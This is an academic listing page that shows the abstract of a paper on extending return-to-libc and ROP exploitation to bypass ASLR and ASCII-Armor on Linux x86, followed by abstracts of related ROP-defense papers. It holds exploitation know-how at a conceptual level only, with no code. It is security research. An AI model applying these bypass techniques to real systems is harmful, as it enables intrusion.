Payload Already Inside: Data Reuse for Rop Exploits
ثبت نشده
چکیده
Return-oriented programming (ROP), based on return-to-libc and borrowed-code-chunks techniques, is one of the buzzing advanced exploitation techniques these days to bypass NX. There are several practical works using ROP techniques for exploitations on Windows, iPhone OS to bypass DEP and code signing. On most of modern Linux distributions, ASCIIArmor address mapping (which maps libc addresses starting with NULL byte) and Address Space Layout Randomization (ASLR) are enable by default to protect against return-to-libc / ROP techniques. In this paper, we will show how we can extend old advanced return-to-libc techniques to multistage techniques that can bypass ASLR and ASCII-Armor mapping and make ROP/return-to-libc exploitation on modern Linux x86 become easy. In addition, by reusing not only codes but also data from the binary itself, we can build any chained ret2libc calls or ROP calls to bypass ASLR protection.
منابع مشابه
kBouncer: Efficient and Transparent ROP Mitigation
The wide adoption of non-executable page protections in recent versions of popular operating systems has given rise to attacks that employ return-oriented programming (ROP) to achieve arbitrary code execution without the injection of any code. Existing defenses against ROP exploits either require source code or symbolic debugging information, impose a significant runtime overhead, which limits ...
متن کاملDefeating Zombie Gadgets by Re-randomizing Code upon Disclosure
Over the past few years, return-oriented programming (ROP) attacks have emerged as a prominent strategy for hijacking control of software. The full power and flexibility of ROP attacks was recently demonstrated using just-intime ROP tactics (JIT-ROP), whereby an adversary repeatedly leverages a memory disclosure vulnerability to identify useful instruction sequences and compile them into a func...
متن کاملAggrandizing the beast's limbs: patulous code reuse attack on ARM architecture
Since smartphones are usually personal devices full of private information, they are a popular target for a vast variety of real-world attacks such as Code Reuse Attack (CRA). CRAs enable attackers to execute any arbitrary algorithm on a device without injecting an executable code. Since the standard platform for mobile devices is ARM architecture, we concentrate on available ARM-based CRAs. Cu...
متن کاملChronomorphic Programs: Using Runtime Diversity to Prevent Code Reuse Attacks
Return Oriented Programming (ROP) attacks, in which a cyber attacker crafts an exploit from instruction sequences already contained in a running binary, have become popular and practical. While previous research has investigated software diversity and dynamic binary instrumentation for defending against ROP, many of these approaches incur large performance costs or are susceptible to Blind ROP ...
متن کاملLearning how to prevent return-oriented programming efficiently
The discovery of recent zero-day exploits against Microsoft Word, Adobe Flash Player and Internet Explorer demonstrate that return-oriented programming (ROP) is the most severe threat to software system security. Microsoft’s 2013 Software Vulnerability Exploitation trend report found that 73% of all vulnerabilities are exploited via ROP. The core idea of ROP is to exploit the presence of so-cal...
متن کامل